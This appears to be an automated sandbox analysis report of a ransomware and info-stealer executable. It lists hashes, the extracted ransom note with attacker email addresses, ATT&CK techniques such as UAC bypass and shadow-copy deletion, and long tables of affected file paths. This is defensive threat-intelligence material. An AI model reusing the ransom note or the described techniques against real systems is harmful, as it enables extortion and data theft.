e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f

General

Target

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
Size

1.1MB
MD5

a67baae890d64e81a3f0b250884c8521
SHA1

c41e3830637b1bf722d0dbd5a9207571f33e69d5
SHA256

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f
SHA512

e71a26b408a302a08a9e478d1c0f20a138b6b8ff9a564c8d4dbe3e504da3ca7cb7e29dea4878cc248fc82c575dab94951654a6f3c925b07a3b82b8782478bf23

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\Read_Me!_.txt

Ransom Note

All Your Files Encrypted And Sensitive Data Downloaded (Financial Documents,Contracts,Invoices etc.. ). To Get Decryption Tools You Should Buy Our Decrption Tools And Then We Will Send You Decryption Tools And Delete Your Sensitive Data From Our Servers. If Payment Is Not Made We have to Publish Your Sensitive Data If Necessary Sell Them And Send Them To Your Competitors And After A While Our Servers Will Remove Your Decrypion Keys From Servers. Your Files Encrypted With Strongest Encryption Algorithm So Without Our Decryption Tools Nobody Can't Help You So Do Not Waste Your Time In Vain! Your ID: 6PsJ67 Email Address: FreedomTeam@mail.ee In Case Of Problem With First Email Write Us E-mail At : Freedom29@Tutanota.com Send Your ID In Email And Check Spam Folder. This Is Just Business To Get Benefits, If Do Not Contact Us After 48 Hours Decryption Price Will x2. What Guarantee Do We Give You ? You Should Send Some Encrypted Files To Us For Decryption Test. ---------------------------------------------------------------------- Attention! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files. In Case Of Trying To Decrypt Files With Third-Party Sofwares,This May Make The Decryption Harder So Prices Will Be Rise. ---------------------------------------------------------------------- How To Buy Bitcoin : Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Get More Info By Searching At Google : https://www.coindesk.com/learn/how-can-i-buy-bitcoin/

Emails

FreedomTeam@mail.ee

Freedom29@Tutanota.com

Extracted

Path

C:\MSOCache\All Users\Read_Me!_.txt

Ransom Note

All Your Files Encrypted And Sensitive Data Downloaded (Financial Documents,Contracts,Invoices etc.. ). To Get Decryption Tools You Should Buy Our Decrption Tools And Then We Will Send You Decryption Tools And Delete Your Sensitive Data From Our Servers. If Payment Is Not Made We have to Publish Your Sensitive Data If Necessary Sell Them And Send Them To Your Competitors And After A While Our Servers Will Remove Your Decrypion Keys From Servers. Your Files Encrypted With Strongest Encryption Algorithm So Without Our Decryption Tools Nobody Can't Help You So Do Not Waste Your Time In Vain! Your ID: 6PsJ67 Email Address: FreedomTeam@mail.ee In Case Of Problem With First Email Write Us E-mail At : Freedom29@Tutanota.com Send Your ID In Email And Check Spam Folder. This Is Just Business To Get Benefits, If Do Not Contact Us After 48 Hours Decryption Price Will x2. What Guarantee Do We Give You ? You Should Send Some Encrypted Files To Us For Decryption Test. ---------------------------------------------------------------------- Attention! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files. In Case Of Trying To Decrypt Files With Third-Party Sofwares,This May Make The Decryption Harder So Prices Will Be Rise. ---------------------------------------------------------------------- How To Buy Bitcoin : Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Get More Info By Searching At Google : https://www.coindesk.com/learn/how-can-i-buy-bitcoin/All Your Files Encrypted And Sensitive Data Downloaded (Financial Documents,Contracts,Invoices etc.. ). To Get Decryption Tools You Should Buy Our Decrption Tools And Then We Will Send You Decryption Tools And Delete Your Sensitive Data From Our Servers. If Payment Is Not Made We have to Publish Your Sensitive Data If Necessary Sell Them And Send Them To Your Competitors And After A While Our Servers Will Remove Your Decrypion Keys From Servers. Your Files Encrypted With Strongest Encryption Algorithm So Without Our Decryption Tools Nobody Can't Help You So Do Not Waste Your Time In Vain! Your ID: 6PsJ67 Email Address: FreedomTeam@mail.ee In Case Of Problem With First Email Write Us E-mail At : Freedom29@Tutanota.com Send Your ID In Email And Check Spam Folder. This Is Just Business To Get Benefits, If Do Not Contact Us After 48 Hours Decryption Price Will x2. What Guarantee Do We Give You ? You Should Send Some Encrypted Files To Us For Decryption Test. ---------------------------------------------------------------------- Attention! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files. In Case Of Trying To Decrypt Files With Third-Party Sofwares,This May Make The Decryption Harder So Prices Will Be Rise. ---------------------------------------------------------------------- How To Buy Bitcoin : Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Get More Info By Searching At Google : https://www.coindesk.com/learn/how-can-i-buy-bitcoin/

Emails

FreedomTeam@mail.ee

Freedom29@Tutanota.com

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\InstallUnregister.tiff	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Pictures\ExportSearch.tiff	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Drops startup file 5 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 208.67.222.222
Destination IP 208.67.222.222
Destination IP 208.67.222.222

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Drops desktop.ini file(s) 64 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-790309383-526510583-3802439154-1000\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W5LB8O2W\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\1O80FYZJ\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\GA2W0K9L\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TP9I05FL\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z8MOBTG4\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FDVO4NFQ\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0XM8UCER\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened (read-only)	\??\B:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\M:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\U:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\V:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\W:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\Y:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\A:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\P:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\R:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\T:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\Z:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\K:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\G:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\H:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\I:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\N:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\O:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\E:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\J:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\L:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\Q:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\S:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\X:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\F:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Drops file in Program Files directory 64 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2ssv.dll	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jre7\bin\dcpr.dll[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATHEDITOR_COL.HXT	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02214_.GIF[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR39F.GIF	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105272.WMF[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Hand Prints.htm	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTES.ICO	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	\??\c:\Program Files\Internet Explorer\sqmapi.dll	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT_COL.HXT	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jre7\bin\net.dll[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\js\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt[ID=6PsJ67-Mail=FreedomTeam@mail.ee].o5rD	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\Presentation Designs\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\STSLISTI.DLL	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libfluidsynth_plugin.dll	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152600.WMF	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SWEST_01.MID	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0332364.WMF	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Australia\Darwin	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
